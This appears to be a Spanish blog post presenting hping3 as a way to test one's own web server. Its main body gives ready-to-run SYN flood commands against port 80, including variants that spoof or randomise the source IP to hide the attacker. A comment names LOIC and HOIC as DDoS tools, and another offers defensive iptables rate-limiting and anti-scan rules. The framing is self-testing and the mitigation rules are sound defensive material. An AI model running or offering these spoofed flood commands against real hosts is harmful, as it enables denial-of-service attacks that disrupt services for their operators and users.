[DoS]Probando nuestra seguridad, autoatacándonos

La herramienta se llama hping3.

Con esta herramienta podremos realizar ataque  SYN Flood Attack (DDos) denegando servicios a otras máquinas.

i

– Para empezar debemos instalar el paquete:

sudo apt-get install hping3

– Una vez instalado, realizaremos el ataque DDos, escribiendo esto en un terminal:

hping3 -p 80  -S –flood ip_atacada

Por ejemplo:

hping3 -p 80  -S –flood 192.168.1.15

-También podemos hacer que nuestra ip no sea visible de la siguiente manera:

hping3 -a ip_falsa -p 80  -S –flood ip_atacada

Por ejemplo:

hping3 -a 192.168.1.234 -p 80  -S –flood 192.168.1.15

-Otra forma es usando –rand-source y de esta manera genera un ip falsa aleatoria:

hping3 –rand-source -p 80  -S –flood ip_atacada

Por ejemplo:

hping3 –rand-source -p 80  -S –flood 192.168.1.15

Prueben y refuercen su seguridad en Apache, Lighttpd, Ngix, Cherokee, etc…

Saludos y espero les sea útil.

6 comentarios de “[DoS]Probando nuestra seguridad, autoatacándonos

  1. Otros programas que nos pueden ayudar a autoatacarnos son LOIC[low orbit ion cannon] y HOIC[high orbit ion cannon], cuya función principal es los DDoS.

  2. Añade a iptables reglas de conteo de paquetes, para el puerto 80, es decir, 10 paquetes por segundo, o algo similar. También agregar reglas para evitar spoofeo, netscanning, evitar paquetes inválidos, etc. Por ejemplo:

    iptables -A INPUT -p tcp ! –syn -j REJECT –reject-with tcp-reset
    iptables -A INPUT -m state –state INVALID -j DROP
    iptables -A INPUT -p tcp -m tcp –tcp-flags SYN,RST,ACK SYN -m limit –limit 1/sec -j ACCEPT
    iptables -A INPUT -p tcp -m tcp –tcp-flags FIN,SYN,RST,ACK RST -m limit –limit 1/sec -j ACCEPT

    #Esta regla requiere el módulo «recent». Se añade cada ip que se conecte a la tabla de recent. Por por cada ip en la tabla de recent si hace mas de x hits en x segundos, se dropea.

    modprobe ipt_recent
    iptables -A INPUT -p tcp –dport 80 -m state –state NEW -m recent –set
    iptables -A INPUT -p tcp –dport 80 -m state –state NEW -m recent –update –seconds 10 –hitcount 10 -j DROP

    #Permitir el ping, pero a 1 paquete por segundo, para evitar un ataque ICMP Flood
    iptables -A INPUT -p icmp -m state –state NEW –icmp-type echo-request -m limit –limit 1/s –limit-burst 1 -j ACCEPT
    iptables -A INPUT -p icmp -j DROP

    # Evitar que nos escaneen la red…
    iptables -A INPUT -i $ETH -p tcp -m tcp –tcp-flags FIN,SYN,RST,PSH,ACK,URG NONE –j DROP
    iptables -A INPUT -i $ETH -p tcp -m tcp –tcp-flags SYN,FIN SYN,FIN –j DROP
    iptables -A INPUT -i $ETH -p tcp -m tcp –tcp-flags SYN,RST SYN,RST –j DROP
    iptables -A INPUT -i $ETH -p tcp -m tcp –tcp-flags FIN,RST FIN,RST –j DROP
    iptables -A INPUT -i $ETH -p tcp -m tcp –tcp-flags ACK,FIN FIN –j DROP
    iptables -A INPUT -i $ETH -p tcp -m tcp –tcp-flags ACK,URG URG –j DROP

    Hay multiples opciones, solo hay que estudiar y probar. Un saludo @elMor3no.

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *